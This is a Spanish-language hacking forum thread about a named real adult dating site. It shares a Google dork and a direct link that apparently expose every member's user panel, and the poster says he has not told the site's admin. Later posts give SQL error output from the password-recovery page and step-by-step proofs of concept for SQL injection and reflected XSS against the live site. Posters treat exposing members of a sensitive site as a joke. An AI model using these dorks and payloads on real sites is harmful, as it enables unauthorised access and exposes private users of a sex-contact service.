Hola Gente. Si bien este fallo no es por sqli o xss. No deja de ser un bug de configuración del server al momento de ser indexado!!!.
Se explota con un simple Dork como este:
site:britishsexcontacts.com/ inurl:members
Lo cual nos permite acceder al panel de users de todos los miembros de esta pagina }:)
Aqui va un link:
http://www.britishsexcontacts.com/Members/Reply.php?sid=47486 (http://www.britishsexcontacts.com/Members/Reply.php?sid=47486)
No lo he reportado todavia al admin!!!.
Saludos y no se haz malos!!!.
No podías utilizarlo en una floristería o en una empresa de oficinas heeee. ;D ;D ;D ;D ;D
jajaja muy buena!!!.
No tienes permitido ver los links.
Registrarse o Entrar a mi cuenta
No lo he reportado todavia al admin!!!.
Ya entiendo porque 8)
Les cuento que jugando un poco con esto consegui un sql error. No lo he tratado de explotar aun
they have fixed it
No tienes permitido ver los links.
Registrarse o Entrar a mi cuenta
Hola Gente. Si bien este fallo no es por sqli o xss. No deja de ser un bug de configuración del server al momento de ser indexado!!!.
Se explota con un simple Dork como este:
site:britishsexcontacts.com/ inurl:members
Lo cual nos permite acceder al panel de users de todos los miembros de esta pagina }:)
Aqui va un link:
http://www.britishsexcontacts.com/Members/Reply.php?sid=47486 (http://www.britishsexcontacts.com/Members/Reply.php?sid=47486)
No lo he reportado todavia al admin!!!.
Saludos y no se haz malos!!!.
bueniisimo el dork encontrado máquina, nos hemos hechado unas risas muy buenas cuando se lo he enseñado a unos colegas ;D ;D ;D ;D
Un saludo!
No tienes permitido ver los links.
Registrarse o Entrar a mi cuenta
Citar
bueniisimo el dork encontrado máquina, nos hemos hechado unas risas muy buenas cuando se lo he enseñado a unos colegas ;D ;D ;D ;D
Un saludo!
Gracias. Un saludo capo!. Y esperamos tus aportes!!!.
Pues practicando un poquito de lo leído en el foro de XSS me han surgido unos Warning en el apartado de logueo y recuperar password ... o.O
CitarPassword Retrieval
Sorry, the email address ' was not found on our system
Click here to try again.
Warning: mysql_fetch_array() expects parameter 1 to be resource, boolean given in /var/www/vhosts/britishsexcontacts.com/www/Forgotten.php on line 25
Warning: mysql_num_rows() expects parameter 1 to be resource, boolean given in /var/www/vhosts/britishsexcontacts.com/www/Forgotten.php on line 26
No tienes permitido ver los links.
Registrarse o Entrar a mi cuenta
Pues practicando un poquito de lo leído en el foro de XSS me han surgido unos Warning en el apartado de logueo y recuperar password ... o.O
CitarPassword Retrieval
Sorry, the email address ' was not found on our system
Click here to try again.
Warning: mysql_fetch_array() expects parameter 1 to be resource, boolean given in /var/www/vhosts/britishsexcontacts.com/www/Forgotten.php on line 25
Warning: mysql_num_rows() expects parameter 1 to be resource, boolean given in /var/www/vhosts/britishsexcontacts.com/www/Forgotten.php on line 26
Posiblemente vulnerable a sqli con booleanos, sigue por ese camino :D
Mientras jugaba con tu dork, me di cuenta que britishsexcontacts[.]com es vulnerable a SQL INJECTION y XSS
--> SQL INJECTION
http://www.britishsexcontacts.com/Members/Reply.php?sid=47486'
[!] ERROR SQL: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '' LIMIT 1' at line 1
SELECT Filename, Filename_Private FROM qdgirls WHERE ID = 47486' LIMIT 1;
-->XSS y SQL INJECTION
PoC_1
1.- En la pagina principal (http://www.britishsexcontacts.com/Members/index.php) esta un apartado para realizar busquedas (quiero creer que de usuarios)
2.- Una vez identificado esta seccion ponemos una comilla simple ' y nos notificara el error SQL, el cual puede nos permite realizar una inyeccion
3.- En este mismo apartado ingresamos el payload de javascript '"><script>alert(/X/)</script> y nos levatara el alert
:3
--> XSS
PoC
1.- ingresamos a la pagina principal (http://www.britishsexcontacts.com/Members/index.php)
2.- Ya una vez dentro de la pagina, a la URL le agregamos /'"><script>alert(/X/)</script> para que nos quede de la siguiente forma: http://www.britishsexcontacts.com/Members/index.php/'"><script>alert(/X/)</script> y listo